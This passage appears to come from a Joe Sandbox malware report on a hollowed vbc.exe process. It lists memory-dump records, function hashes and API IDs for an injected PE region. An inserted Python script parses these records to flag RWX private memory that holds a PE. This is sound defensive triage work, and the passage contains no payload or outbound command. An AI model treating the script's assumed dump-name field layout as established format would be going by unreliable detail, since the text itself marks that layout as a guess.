                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_41f000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4f7dd743360f4df68f7be573f413038e00cc2a0e7e620416d517e22141e6a65e
                                                                                                                                                  • Instruction ID: 799c57cb42787c0bf5d1ce17ac39346a2abfc1e09e798fb22bcb30c317675207
                                                                                                                                                  • Opcode Fuzzy Hash: 4f7dd743360f4df68f7be573f413038e00cc2a0e7e620416d517e22141e6a65e
                                                                                                                                                  • Instruction Fuzzy Hash: A2A022A0C2830C03002030FA2B03023B30CC000008F8003EAAE8C022223C02A83300EB
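The records above all point at the same picture: process 0xC (the hollowed vbc.exe) executing from a dump at 055A0000 that Joe Sandbox marks "based on PE: true", with every function in it ending in a LdrInitializeThunk call. When triaging many of these reports it helps to pull that signal out of the record text mechanically. The script below is an added example, not Joe Sandbox code. It parses "APIs" and "Memory Dump Source" records of the shape shown on this page (a few lines copied from above are embedded as the constructed sample), decodes the protection and region-type fields of the .sdmp file name using the winnt.h constants, and flags regions that are RWX private memory containing a PE. The field layout of the .sdmp name (PID.stage.dumpid.base.protect.flags.type.reserved) is an assumption made here; only the protect and type fields are decoded, the rest are kept raw.

```python
"""Triage Joe Sandbox 'Memory Dump Source' records for injected-PE indicators (added example)."""
import re
from dataclasses import dataclass, field

# Constructed sample: lines copied from the records on this page, stripped of indentation.
SAMPLE = """\
APIs
• LdrInitializeThunk.NTDLL(05631B8A,?,00000000,00000001,00000010,00000000,00000000,000000FE,00000005,?,00000004,?,00000004,?,00000002,?), ref: 05612EAA
Memory Dump Source
• Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
• Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmp
Memory Dump Source
• Source File: 0000000C.00000002.1857527976.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 0041F000, based on PE: false
"""

# Windows memory constants from winnt.h (these values are certain).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# ASSUMPTION: the .sdmp name is PID.stage.dumpid.base.protect.flags.type.reserved.sdmp.
# Only 'protect' and 'mtype' are decoded; 'stage', 'flags' and 'reserved' are kept raw.
SDMP_RE = re.compile(
    r"(?P<pid>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dumpid>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<flags>[0-9A-Fa-f]{8})\."
    r"(?P<mtype>[0-9A-Fa-f]{8})\.(?P<reserved>[0-9A-Fa-f]{8})\.sdmp"
)
SOURCE_RE = re.compile(
    r"Source File:\s*(?P<name>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)
# One API line: "• Name.MODULE(args), ref: ADDRESS" (bullet and indentation are skipped by \W*).
API_RE = re.compile(r"^\W*(?P<api>\w+)\.(?P<module>\w+)\(.*\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


@dataclass
class DumpRecord:
    pid: int
    base: int
    protect: str
    mem_type: str
    based_on_pe: bool
    apis: list = field(default_factory=list)   # API names seen in the function(s) above the record
    refs: list = field(default_factory=list)   # call-site addresses for those APIs

    def flags(self) -> list:
        """Heuristic injection indicators derived from the decoded fields."""
        out = []
        if self.protect == "PAGE_EXECUTE_READWRITE" and self.mem_type == "MEM_PRIVATE":
            out.append("rwx-private")              # writable+executable private memory
            if self.based_on_pe:
                out.append("pe-in-private-memory")  # a PE header inside it: injected/unpacked module
        if "LdrInitializeThunk" in self.apis:
            out.append("ldr-thunk-call")            # code in the region reaches the loader thunk
        return out


def parse_records(text: str) -> list:
    """Walk the report text and attach preceding API lines to each Memory Dump Source record."""
    records, pending_apis, pending_refs = [], [], []
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            pending_apis.append(m.group("api"))
            pending_refs.append(int(m.group("ref"), 16))
            continue
        m = SOURCE_RE.search(line)
        if not m:
            continue
        n = SDMP_RE.fullmatch(m.group("name"))
        if not n:
            raise ValueError(f"unexpected dump name: {m.group('name')}")
        protect_val = int(n.group("protect"), 16)
        type_val = int(n.group("mtype"), 16)
        records.append(DumpRecord(
            pid=int(n.group("pid"), 16),
            base=int(m.group("offset"), 16),
            protect=PAGE_PROTECT.get(protect_val, f"0x{protect_val:X}"),
            mem_type=MEM_TYPE.get(type_val, f"0x{type_val:X}"),
            based_on_pe=(m.group("pe") == "true"),
            apis=pending_apis, refs=pending_refs,
        ))
        pending_apis, pending_refs = [], []
    return records


def triage(text: str) -> list:
    """Return (pid, base, protect, type, flags) for every dump region in the text."""
    return [(r.pid, r.base, r.protect, r.mem_type, r.flags()) for r in parse_records(text)]


if __name__ == "__main__":
    for pid, base, prot, mtype, flags in triage(SAMPLE):
        print(f"pid={pid:#x} base={base:#010x} {prot} {mtype} {flags}")
```

Run against a full report export, the RWX-private-PE hits are the dumps worth loading into a disassembler first; the 0041F000 region of the same process is also RWX private but carries no PE header, so it is a secondary candidate.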
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 48624451-0
                                                                                                                                                  • Opcode ID: e9b61ce6a7188e01f09834d08b9464509a89ce63db43e00356385dac7e8b116d
                                                                                                                                                  • Instruction ID: cc50e4fac3b2ccf84e96ca7f4c0e6f27e9f3cb2d721fccc014d63afa025364fe
                                                                                                                                                  • Opcode Fuzzy Hash: e9b61ce6a7188e01f09834d08b9464509a89ce63db43e00356385dac7e8b116d
                                                                                                                                                  • Instruction Fuzzy Hash: 5A5139BAA04156BFCB10DF9EC99097EFBB9BB08200754C569E865D7641E634DE00CBE4
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                  • String ID: +$-$0$0
                                                                                                                                                  • API String ID: 1302938615-699404926
                                                                                                                                                  • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                                                                                                  • Instruction ID: 1415726cbf5397d2a55c6daac0fbc9d99ae5a5604aa2d309a481dec5fe392983
                                                                                                                                                  • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                                                                                                  • Instruction Fuzzy Hash: 71819170E052499EDF24CE68C4517BEBBB2BF55710F1C4159DCA1A77B1CA349881CB6C
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                  • String ID: +$-
                                                                                                                                                  • API String ID: 1302938615-2137968064
                                                                                                                                                  • Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                                                                                                                  • Instruction ID: ea07530fd62f45ba5f1caafc14a1e32b7a112c86138f32744bbb7d8180c4c7ec
                                                                                                                                                  • Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                                                                                                                  • Instruction Fuzzy Hash: 8C918F71E0420A9EDB24DE69C881ABFB7A6FF44360F1C451AEC56E77C0DA309942CB5C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $$@
                                                                                                                                                  • API String ID: 0-1194432280
                                                                                                                                                  • Opcode ID: 936d6768b4610695b92b6e5bfaa5899ed3a07fbd4d5b5ef1c5abaa4d93fd3cc3
                                                                                                                                                  • Instruction ID: d203773c07780a697cc742bbd315586f82abadb3e86ba9cdb186d5d96918f7f0
                                                                                                                                                  • Opcode Fuzzy Hash: 936d6768b4610695b92b6e5bfaa5899ed3a07fbd4d5b5ef1c5abaa4d93fd3cc3
                                                                                                                                                  • Instruction Fuzzy Hash: 3B812A76D002699BDB35CB94CC59BEAB7B5BF48710F0041EAE90AB7640D7709E84CFA4
                                                                                                                                                  APIs
                                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 05615E34
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorHandling__start
                                                                                                                                                  • String ID: pow
                                                                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                                                                  • Opcode ID: cb8243b8541bd0673af223789d61896265c15a056897432f256554fdef265d05
                                                                                                                                                  • Instruction ID: 48aeb72a92f0792f6c896773936a7e69b0eaac2f27de40a4727ad7e3e439aeb8
                                                                                                                                                  • Opcode Fuzzy Hash: cb8243b8541bd0673af223789d61896265c15a056897432f256554fdef265d05
                                                                                                                                                  • Instruction Fuzzy Hash: 70517671E1C20596CB21B724C9067BEBF91FB80700F1C8959EC97867A8EE308495CF4E